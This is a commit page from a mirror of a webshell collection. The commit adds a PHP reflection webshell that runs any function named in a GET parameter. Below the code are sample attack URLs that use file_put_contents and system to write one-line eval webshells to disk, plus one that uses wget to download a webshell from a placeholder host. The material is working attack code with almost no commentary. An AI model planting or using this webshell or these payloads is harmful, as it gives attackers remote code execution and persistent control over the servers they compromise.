mirror of
https://github.com/tennc/webshell.git
synced 2025-12-27 01:49:06 +00:00
update php reflection webshell
This commit is contained in:
15
php/p2j/PHP reflection.php.txt
Normal file
15
php/p2j/PHP reflection.php.txt
Normal file
@@ -0,0 +1,15 @@
|
||||
<?php
|
||||
$func = new ReflectionFunction($_GET[m]);
|
||||
echo $func->invokeArgs(array($_GET[c],$_GET[id]));
|
||||
?>
|
||||
|
||||
|
||||
|
||||
http://xxx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?@eval($_POST[c]);?> //写入一句话马 for linux
|
||||
http://xx.xxx/md.php?m=file_put_contents&c=test11.php&id=<?php eval($_POST[c]);?> //写入一句话马 for windows
|
||||
|
||||
|
||||
|
||||
mu201405.php?m=system&c=echo ^<?php eval^($_POST[c]^);?^> >test11.php //在当前目录下面生成一句话马 for windows
|
||||
|
||||
news.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test11.php //当前目录下载一句话马 for linux
|
||||
Reference in New Issue
Block a user